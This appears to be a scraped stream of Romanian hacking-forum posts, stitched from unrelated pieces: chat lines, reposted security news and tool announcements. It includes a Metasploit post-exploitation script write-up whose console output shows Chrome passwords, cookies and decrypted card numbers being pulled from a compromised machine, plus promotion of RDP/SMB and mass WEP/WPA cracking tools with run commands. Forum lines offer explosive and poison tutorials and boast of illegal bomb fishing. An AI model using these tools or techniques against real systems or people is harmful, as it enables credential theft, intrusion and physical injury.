begood

The results were spectacular. 171 million names (100 million unique)

aveai nickul homosexual pana recent pe contul asta, ai fost cautat.

incercati baza de date serials2000 ... cred ca are peste 10 milioane.

afla ip-urile pe care a fost rulat executabilul. nu ma intereseaza prin ce metoda faci asta

cu cat costa un produs mai mult, si e mai promovat, cu atat userii il doresc mai tare. cand e lansat gratis pe net, apare boom-ul => e promovat la maxim. e o strategie de marketing. nimic mai mult. si eu pot sa fac un program care sa-l vand cu 5000 euroi, dar nu valoreaza nici 20. fac reclama cat incape, lumea pune botu, ma fac apoi ca-l crackuiesc si-l postez pe net si trimit cateva scrisori la niste site-uri de stiri underground => epic win. publicitate cacalau.

Citeam http://rstcenter.com/forum/26064-encrypted-obfuscated-your-p2p-protocol-can-still-ided.rst si am dat peste documentul (PDF) in care era explicata toata procedura. La pagina 10 vad un nume cunoscut : Luigi Auriemma. Pe scurt ce face "programul" (e un singur dll) : Stocheaza tot traficul facut de un program intr-un fisier .pcap (Wireshark). Iar asta doar cu un dll ce trebuie introdus in acelasi folder cu executabilul pe care dorim sa-l analizam. *Trebuie sa aveti winpcap instalat. Luigi Auriemma nota personala : presupun ca se foloseste de dll hijacking LE: da, am avut dreptate

It's apparent that the physics lexicon has been dragged kicking and screaming out of the 19th century with a recent paper published in Nature Photonics titled "Hacking commercial quantum cryptography systems by tailored bright illumination." I never thought I would live to see the word "hacking" used in its proper context in a physics paper. But enough about physics lingo. What about the quantum encryption hacks alluded to by the title? What we have is another paper demonstrating that the weak point of quantum encryption systems is the point where classical meets quantum. This is not the first hack of its kind, but, it is, in true hacker tradition, the first focused on a commercial system. Quantum key distribution makes use of the laws of physics to provide a guaranteed level of security. Boiled down to its essential components, quantum systems must be measured to determine their state. In making the measurement, the system is forced into a certain state. An eavesdropper cannot listen in on a quantum communication without everyone else on the line knowing that someone is getting the goods on them. It's security heaven: the walls may have ears, but in the quantum world, they are fluorescent pink and scream I CAN HEAR YOU. This vision of security nirvana breaks down when you consider that the act of measurement, at some point, involves taking a quantum property and making it classical. At that point, vulnerabilities creep into the system. In the work of Lydersen and coworkers, the point of attack is precisely that: the photodiodes used to detect light. In quantum cryptographic systems, the quantum part is transferred in packets that consist of just a single photon. Photons, being kind of low on energy, are hard to detect, but there's a type of photodiode called an "avalanche photodiode" that is pretty good at it. In these photodiodes, a section of material has a voltage applied across it, giving it a large electric field. When the photon hits the photodiode, the material loses an electron. The field grabs hold of the electron and accelerates it, and, like every good drunk driver, the electron collides, freeing up more electrons. This sets off a chain reaction, where a single photon generates a large number of electrons that can be recorded as a click. Avalanche photodiodes are not without their problems. Less than half of absorbed photons actually set off an avalanche, and, quite often, avalanches occur even when no photon is around to trigger them—these spurious clicks are called dark counts. Engineers get around the dark count problem by lowering the voltage and preventing avalanches until they expect a photon. There isn't much you can do about the detector not seeing every photon, except to know that the problem exists and keep sending photons until enough bits have been received. It is precisely these two properties that are used to listen in on quantum key distribution. This is how the attack works. Eve—the eternal villain in security—gets in between Alice and Bob. Her first task is to get control over Bob's photodiodes. To do this, she sends a short light pulse along with a small amount of light that stays on all the time. The short pulse looks like a dark count and triggers the photodiode to switch the accelerating field off to stop the avalanche, while the continuous light field keeps the accelerating field off. Now Bob can't detect single photons, nor does he get dark counts, but, if a sufficiently intense light pulse hits his photodiodes, he will think he has seen a single photon. Eve is now ready to steal the key. When Alice sends her single photons to Bob to create a private key, Eve imitates Bob and intercepts all of the photons. As she measures each photon, she resends the results of her measurement, not as a single photon, but as a bright light pulse. Bob, unaware of Eve, is randomly choosing from a set of measurements and then making that measurement on the light pulse. There are two possible choices here: he chooses the same measurement that Eve chose, or he chooses a different measurement. If Bob chooses to make the same measurement as Eve, then Eve's light pulse ends up falling on a single photodetector, and, since it is bright, it makes that detector go click. If Bob chooses to make a different measurement, Eve's pulse gets split up so only half falls on each detector. The light is no longer bright enough to make either detector go click. The upshot is that Bob ends up with identical results to Eve, but half the measurements get thrown away, and Eve doesn't know which half. You might think that would be a problem, but remember, the detectors don't always click anyway. Eve doesn't get every photon that Alice sends, and Bob doesn't get every bright pulse that Eve sends, but the whole system is rather inefficient anyway. Bob can never be absolutely sure how good his connection with Alice is, so Alice just keeps sending photons until Bob finally tells her to stop. Every other step of the process is done in open classical communication, in which Eve can, well, eavesdrop on with ease. From Alice and Bob's open chatter, Eve can match her results with Bob's and from there it's game over. End result: Eve has an identical key to Bob and Alice. So, how do you get around this? It's going to be difficult, because every solution involves interfering with the photodiode and making it less efficient. One could periodically divert the light to a non-amplified photodiode to check for the presence of a continuous light beam. Or one might be able to play with the amplification of the photodiode to try and distinguish a continuous light field from dark counts. But no matter what, it is pretty clear that quantum key distribution has only changed the playground, but not the game played between hackers and cryptographers. Quantum key distribution in superposition of "insecure" and "unneeded"

Typical Web traffic is easy enough to spot: it uses TCP port 80. But plenty of protocols prefer to remain in the shadows and purposely make themselves difficult to identify—including Skype, BitTorrent, and eMule. If easy to identify, such protocols might make a tempting target for ISPs seeking to throttle back certain kinds of traffic. However, even these "obfuscated" protocols have a hard time hiding their secrets; encrypting the traffic can't keep them hidden, nor can certain tunneling behaviors that try to disguise one sort of traffic as another . Who wants to identify traffic that hopes to remain hidden? Vendors of traffic analysis hardware, for one, who sell their gear to ISPs and must first be able to classify traffic before doing anything useful with it. Deep packet inspection hardware, which can look inside the payload of individual packets, can be thwarted with even light encryption. But vendors have long ago figured out how to identify protocols even when they don't want to be identified, and even when the data is encrypted. There are different ways of doing this, but the most common relies on various arcane statistical measurements: how a protocol negotiates a handshake between a server and client, how it exchanges encryption keys, packet sizes, the order of packet arrivals, etc. Crafting a protocol that has no such distinct identifying characteristics is very, very hard, in part because vendors don't publicize their identification techniques; even when deep packet inspection engines are open-sourced, the truly tricky bits tend to get left out. A pair of Swedish security experts recently released a new paper to remind us just how difficult good protocol obfuscation can be. "Breaking and Improving Protocol Obfuscation," (PDF) by Erik Hjelmvik and Wolfgang John, was written for Chalmers University of Technology and Sweden's Internet Infrastructure Foundation. It shows in detail how the authors were able to routinely identify obfuscated protocols like BitTorrent, Skype, and eMule. But Hjelmik and John aren't out to produce better identification tools. No, their goal is to show the weaknesses in current obfuscated protocols in order to make those protocols better. If the protocols can't be identified, then ISPs can't do much to interfere with them. "The purpose with [sic] our research is not to reinforce active filtering of P2P traffic on the Internet," they write. "Instead we want to support the concept of network neutrality by providing feedback to the creators of obfuscated protocols. As we have observed, the supposed-to-be-obfuscated protocols are not obfuscated enough to avoid statistical identification of various properties specific to the protocols." In the paper, the authors show how an open source tool can be trained to reliably pick out encrypted, proprietary, and obfuscated protocols with more than 90 percent accuracy. (Skype proved most difficult to reliably identify.) To better hide their protocols, designers need to do more than encrypt payloads; they must pay attention to obscuring any unique flow properties as well, using tools like random padding of packets, randomized flushing of the datastream, and tricky techniques to randomize the direction of packet exchanges. Call it the new protocol arms race. Hjelmik and John are working to make tools like SPID (Statistical Protocol IDentification) into lean, mean, traffic identification machines—but they're doing so only in order to push protocol designers to do a better job of obfuscating traffic. Encrypted and obfuscated? Your P2P protocol can still be IDed

Microsoft and Facebook are in talks to further strengthen their search partnership, possibly resulting in Bing gaining access to anonymized data generated by Facebook users to better personalize its search results, according to anonymous sources cited by All Things Digital. Microsoft would be able to use the information from Facebook's Like buttons, which the social giant has managed to have plastered all over the Web. When a user likes a webpage, their Facebook friends are notified; if this deal goes through, Microsoft would also be able to know which webpages users are appreciating, and would be able to work that into Bing's algorithms (it could be particularly useful for Bing News), instead of just relying on spiders scouring the Internet. With Facebook's 500 million users, such a deal could give it quite a boost over Google, which presumably would be excluded from the data. The sources did point out an important hurdle though: because of Facebook's many privacy issues, the possible expansion of the search relationship would only be able to encompass information which users have already agreed to make public. The deal works very well with Microsoft's strategy for social networking: partner rather than compete. "Nobody wants another Facebook," Dharmesh Mehta, Windows Live Director of Product Management, recently told Ars. Furthermore, Microsoft's strong relationship with Facebook is a thorn in Google's side, which benefits the two companies since they are both competing more and more with the search giant. The Microsoft-Facebook partnership has been a roller coaster ride so far which has included a $240 million investment from Microsoft, Live Search powering Facebook, Microsoft winning and then losing ad platform exclusivity for the site, and finally Bing search result integration. All Things Digital emphasizes there's no deal yet—the talks could fall apart. Both Microsoft and Facebook declined to comment on the report. Bing could get access to anonymized Facebook data

If you carry around BackTrack on a USB drive, you might as well take the BackBox for a spin.Yes, it does not have those many tools that the former LiveCD does, but given the time and effort, it will probably reach there. The BackBox is based on Ubuntu 10.04 Lucid Lynx, running a Linux kernel v2.6.32 with Xfce 4.6.1. It provides a complete desktop experience, coupled with a simplified usage of the system resources making it suitable in situations where speed is a crucial factor. BackBox is designed to be an useful and simple tool for Penetration Testing. It also supports themes such as – Thunar, GDM and the Plymouth theme. It contains the following applications and more: kismet medusa msf nikto nmap skipfish sqlmap w3af wireshark <a href="http://www.burstnet.com/ads/ad20486a-map.cgi/ns/v=2.3S/sz=468x60B/" target="_top"> <img onload="NcodeImageResizer.createOn(this);" src="http://www.burstnet.com/cgi-bin/ads/ad20486a.cgi/ns/v=2.3S/sz=468x60B/" border="0" alt="Click Here" title="BackBox Linux: A Flexible Penetration Testing Distribution!" /></a> This distro supports both – 32-bit and 64-bit operating systems! Download BackBox Linux 1 RC Download | BackBox Linux

Need to crack an MS RDP or SMB password? Ncrack 0.3ALPHA to the rescue! Visit Ncrack - High-speed network authentication cracker and thank @ithilgore! Twitter / Nmap Project: Need to crack an MS RDP or ... http://seclists.org/nmap-dev/2010/q3/697 Acesta este primul bruteforcer "adevarat" pentru RDP.

About two months ago, Jeremiah Grossman found a a nice way to exploit the form autofill feature of the Safari browser to extract the stored data. A few days later Google announced that Chrome 6 will support form autofill including credit card information. I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one. The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse. The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData: "Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer." To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension. To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges. To get the data of the currently logged on user, the script allows to automatically migrate into the exlorer.exe process and, after the decryption is done, back into the original process. The following shows the console output of the script: meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run enum_chrome -m [*] current PID is 1100. migrating into explorer.exe, PID=2916... [*] done. [*] running as user 'VM-WINXP\test'... [*] extracting data for user 'test'... [*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'... [*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'... [*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'... [*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'... [*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'... [*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'... [*] creating file 'autofill.json'... [*] creating file 'autofill_profiles.json'... [*] creating file 'autofill_credit_cards.json'... [*] decrypting field 'card_number_encrypted'... [*] creating file 'cookies.json'... [*] creating file 'history.json'... [*] creating file 'logins.json'... [*] creating file 'bookmarks.json'... [*] creating file 'preferences.json'... [*] migrating back into PID=1100... [*] done. meterpreter > The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script): [ { "label": "", "verification_code_encrypted": "", "unique_id": 1, "expiration_year": 2010, "card_number": "", "shipping_address": "", "type": "", "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ", "billing_address": "", "expiration_month": 12, "verification_code": "", "name_on_card": "Test Card", "card_number_encrypted_decrypted": "0123456789012345" } ] You can download the script here: metasploit/enum_chrome.rb at master from svent's misc - GitHub Relentless Coding: Meterpreter Script to extract chrome browser data

"Running 64-bit Linux? Haven't updated yet? You're probably being rooted as I type this. CVE-2010-3081, this week's second high-profile local root exploit in the Linux kernel, is compromising machines left and right. Almost all 64-bit machines are affected, and 'Ac1db1tch3z' (classy) published code to let any local user get a root shell. Ac1db1tch3z's exploit is more malicious than usual because it leaves a backdoor behind for itself to exploit later even if the hole is patched. Luckily, there's a tool you can run to see if you've already been exploited, courtesy of security company Ksplice, which beat most of the Linux vendors with a 'rebootless' version of the patch." Slashdot Linux Story | Linux Kernel Exploit Busily Rooting 64-Bit Machines

Designed for Backtrack4 RC1 distribution of Ubuntu. Linux only; no windows or osx support.To attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments. can be trusted to run without supervision. Features of Wifite. - sorts targets by power (in dB); cracks closest access points first - all WPA handshakes are backed up (to wifite.py’s working directory) - mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit) - numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) - very customizable settings (timeouts, packets/sec, etc) - SKA support (untested) - finds devices in monitor mode; if none are found, prompts for selection - all passwords saved to log.txt - switching WEP attacks does not reset IVS - displays session summary at exit; shows any cracked keys How to run python wifite.py Examples <a href="http://www.burstnet.com/ads/ad20486a-map.cgi/ns/v=2.3S/sz=468x60B/" target="_top"> <img onload="NcodeImageResizer.createOn(this);" src="http://www.burstnet.com/cgi-bin/ads/ad20486a.cgi/ns/v=2.3S/sz=468x60B/" border="0" alt="Click Here" title="Wifite mass wep and wpa cracker for backtrack4" /></a> ./wifite.py -all –dict /pentest/passwords/wordlists/abc.lst ./wifite.py –power 50 -wepw 15 -pps 600 Most of us must be using backtrack for penetration testing and other technical audits for many applications and operating systems. We Wifite is integrated in backtrack next release. Download Wifite Here or wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py use above command can be used from and *nix systems. Wifite – mass wep and wpa cracker for backtrack4 ? PenTestIT

ai creierasu din copilarie d'aia nu halucinezi.

no shit ? cred ca o sa vin cu cateva tutoriale cu si despre explozibil artizanal si otrava home made.

bruteforce-ul dureaza la infinit. e absurd sa intrebi asta. depinde cat de lunga si complexa e parola. ia si tu wpa rainbow tables si sparge cu aia, sau "inchireaza" niste computere si ruleaza dictionare. bruteforce e absurd sa bagi la wpa.

bomba cu carbid. arunci si pescuiesti pestii morti (le pusca vezica cu aer) ce o sa pluteasca la suprafata. am adunat vreo 20 kg intr-o ora asa, la munte.

same shit. banned.

tineye.com e un fel de google pentru imagini. stie sa gaseasca imagini similare de diferite dimensiuni (tu cauti un avatar de 100x100 pixeli, el iti gaseste wallpaper-ul care a fost micsorat la acele dimensiuni) si multe altele, ai pe site descrierea.

Hacktivity 2010, the largest computer hackers' conference in eastern Europe, kicked off Saturday, with some 1,000 participants expected to attend the two-day event, according to organisers. The conference was to bring together officials and computer experts from Hungary and abroad in an informal setting, combining lectures and discussions on serious issues such as Internet security, with lighter fare and games. Bruce Scheier, a world-renowned cyber security expert, opened the congress with a keynote speech. Other well-known participants and lecturers included Alexander Kornbrust of Oracle, Robert Lipovsky form the ESET computer security company's laboratory in Bratislava, and US hacker Mitch Altman, who was organising a hardware workshop. Meanwhile, in the leisure zone, participants could test their ability to break into systems and take control of foreign computers in a variety of games, from "Hack the Vendor," to "Capture the Flag." More information about the event is available on the following Internet site: Hacktivity 1,000 computer hackers meet in Budapest

salvezi poza pe desktop si apoi o urci pe TinEye Reverse Image Search daca ai noroc iti gaseste imagini de rezolutii mai bune

Managing your day-to-day life is not an easy job to do. There are so many things to concern for - housekeeping, shopping, children... And what about cousin's birthday you always forget or important phone numbers? Undoubtedly your working place is covered with dusty yellow (or blue, or pink) sticky notes. If so - PNotes is right for you. Throw the physical stickies away and replace them with virtual ones on your desktop. PNotes (Pinned Notes or Portable Notes, use what you prefer) is written entirely in C and Windows API (with Pelles C for Windows IDE) - so it is fast and light-weight. Ease of use - no installation, just unpack the downloaded archive to any location and run PNotes.exe. Formatting - format and design each note as you wish, using all the advantages of rich text formatting. Skins - there is a variety of skins for PNotes but if you wish, you can run the program in skinless mode, in which case you can stretch notes to any reasonable size. Transparency - you can set notes’ transparency level from opaque to fully transparent. If you enable this feature each note can have its own transparency level. Images - you can add images to notes, making them more expressive. Smilies - besides image files, the set of predefined smilies is at your disposal. Scheduling - use various schedule types to be reminded about significant events by many different ways. Using this feature you may just hide notes and don't worry, you'll be notified in time. Overdue notes tracking - stay alerted even with overdue reminders. Tags - add any number tags to each note for further searching and sorting. Password protection - prevents unauthorized access to program. Encryption - allows all your notes to be stored as encrypted files, so nobody could read their content, even in case you lose your USB stick. Control Panel - this is your central command post. All management is put into effect here. Groups - divide notes into groups of your choice, create new groups and subgroups, control all by mouse click or drag-and-drop. Diary group - special group of notes with its own settings, which allows you to maintain diary-like set. Docking - dock your notes to any side of the screen, forcing them always to be straightened and look like a panel. Searching - search for (or replace) text fragments in all notes, including hidden or in each separate note, or find notes with specified title. Favorites - access intensively used notes by a single click. Custom fonts - use your custom fonts which are not installed on current machine. E-mailing - send notes via e-mail as mail body text or as attachment to any target with PNotes running and open attached note on target machine. Recycle Bin - you decide how you want to delete the unneeded note: completely or send it to Recycle Bin with ability to restore it later. Backing up - you decide whether to make backup copies for changed notes and what is the deepness of backup levels. Internationalization - PNotes is fully Unicode supported and translated into many languages. Portability - PNotes does not require installation, it can be started from any drive (fixed or flash) and leaves no traces on host computer after finishing. Other features - of course there are many other unmentioned features in program, but I suggest you to discover them by yourself, these are delights of any new program, aren't they? I hope that you will enjoy using PNotes as I enjoy developing it! PNotes Portable | PortableApps.com - Portable software for USB drives PNotes PNotes //programul in seara asta l-am "descoperit", e foarte foarte folositor.

nu prea se descurca sa-mi downloadeze un fisier .avi de 350 mb imi da blank page.

doar http proxy poti face ? un tunel http ar fi superb cred ca o sa incep sa ma joc si eu cu asta. apropo, la fel de bine merge si SSL-ul ! https://daat-proxy-rstcenter.appspot.com/rstcenter.com RC4 128bit encryption